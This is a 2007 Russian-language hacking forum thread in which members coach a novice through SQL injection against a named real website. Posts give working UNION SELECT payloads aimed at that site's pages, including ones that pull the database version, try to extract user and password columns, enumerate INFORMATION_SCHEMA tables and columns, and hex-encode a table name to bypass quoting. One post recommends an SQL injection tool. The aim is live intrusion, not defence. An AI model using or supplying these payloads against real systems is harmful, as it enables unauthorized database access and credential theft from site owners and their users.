SQL-inj

Discussion in 'Уязвимости' started by Qwertison, 19 Aug 2007.

  1. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    Вот SQL-inj
    Code:
    http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
    Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?
     
  2. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    А там нет скули. Поищи другие скрипты
     
    1 person likes this.
  3. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    Всмысле, ошибка же есть?
     
  4. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Там не смотрел, но вот тут она точно есть

    Code:
    хттп://mir-tech.ru/group.php?cat=-1+union+select+version()/*
     
    #4 Ksander, 19 Aug 2007
    Last edited: 20 Aug 2007
    4 people like this.
  5. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
    Unknown column 'user' in 'field list'
    Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
     
  6. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    Можно вручную, либо специализированными программами-брутерами
     
  7. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    Какими например, я таких не видел.
     
  8. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
  9. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138

    Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:

    Code:
    union select TABLE_NAME from INFORMATION_SCHEMA.TABLES limit 0,1/* 
    А потом колонки в интересующей нас табле:

    Code:
    union select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*
     
    #9 Ksander, 20 Aug 2007
    Last edited: 20 Aug 2007
  10. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    Все так, только
    INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS
     
  11. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    опечатался =)
     
  12. Qwertison

    Qwertison New Member

    Joined:
    1 Apr 2007
    Messages:
    43
    Likes Received:
    4
    Reputations:
    -13
    Уже надеялся что все.. Смотрю название таблы - http://mir-tech.ru/group.php?cat=-1+union+select+TABLE_NAME+fron+INFORMATION_SCHEMA.TABLES limit 0,1/*
    Называется CHARACTER_SETS.
    Ищу колумн -_http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA.COLUMNS+where+TABLE_NAME='CHARACTER_SETS' limit 0,1/* - не пашет???
     
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=0x4348415241435445525f53455453 limit 0,1/*
     
  14. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Можно и так,
     
  15. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    172
    Likes Received:
    11
    Reputations:
    0
    Qwertison
    у тя с головой все ок???
    я втеме ваши уячзвимости написал тчо икак .... меня бесят такие люди.. тока флудить могут какого зхрена ты создаешь тему клоН?????? ваще чтоли даун... больше слов нет
     
  16. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    для подбора таблиц и много для чего -
    SQl Injection tool, советую
     
    2 people like this.